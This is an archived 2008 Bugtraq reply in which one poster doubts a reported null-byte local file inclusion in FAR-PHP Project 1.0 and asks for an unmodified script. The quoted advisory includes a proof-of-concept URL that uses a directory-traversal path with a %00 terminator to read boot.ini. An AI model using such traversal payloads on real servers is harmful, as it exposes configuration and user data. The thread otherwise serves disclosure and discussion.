[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-id: <1219369613.1131.4.camel@hextic-desktop>
Date: Thu, 21 Aug 2008 21:46:53 -0400
From: William McAfee <sec-community@...goodhacker.com>
To: beenudel1986@...il.com
Cc: bugtraq@...urityfocus.com
Subject: Re: Null Byte Local file Inclusion in FAR - PHP Project version:1.0
I'm sorry, but your screenshot actually leads me to not have much more
confidence. I noticed your titlebar is modified, so that tells me the
script is most likely modified in some way. Provide us with a pure
script, please. Also, on an unrelated note, why are you running
professional? Why did you blank out the bottom half of the window?
What are you hiding?
On Wed, 2008-08-20 at 20:56 -0600, beenudel1986@...il.com wrote:
> ################################################################
> # .___ __ _______ .___ #
> # __| _/____ _______| | __ ____ \ _ \ __| _/____ #
> # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
> # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
> # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
> # \/ \/ \/ #
> # ___________ ______ _ __ #
> # _/ ___\_ __ \_/ __ \ \/ \/ / #
> # \ \___| | \/\ ___/\ / #
> # \___ >__| \___ >\/\_/ #
> # est.2007 \/ \/ forum.darkc0de.com #
>
> ################################################################
>
> # Web Application: FAR - PHP Project version:1.0
> # Vendor's Address :www.far-php.ro
> ################################################################
>
>
> ################################################################
> Author: Beenu Arora
> Address: www.beenuarora.com
> ################################################################
>
>
> #Python Dark Scripts: www.beenuarora.com/work.html
>
> ################################################################
> #Date Found: 21/08/08
> #Severity: High
> #Security Risk:Null Byte Files Retrieval
> #Explaination:It is possible to view the contents of any file (e.g. databases, user information or configuration files) on the web server (under the permission restrictions of the web server user)
>
>
> #POC: http://localhost/farver/index.php?c=/../../../../../../../../boot.ini%00
> #For the POC pic visit: www.beenuarora.com/POC.bmp
>
> ################################################################
> ______________________________________________________________________________________
> |Greetz: D3hydr8,rascal,rsauron,patrick,baltazar,sinner_01 and rest of team memebers. |
> |_____________________________________________________________________________________|
Powered by blists - more mailing lists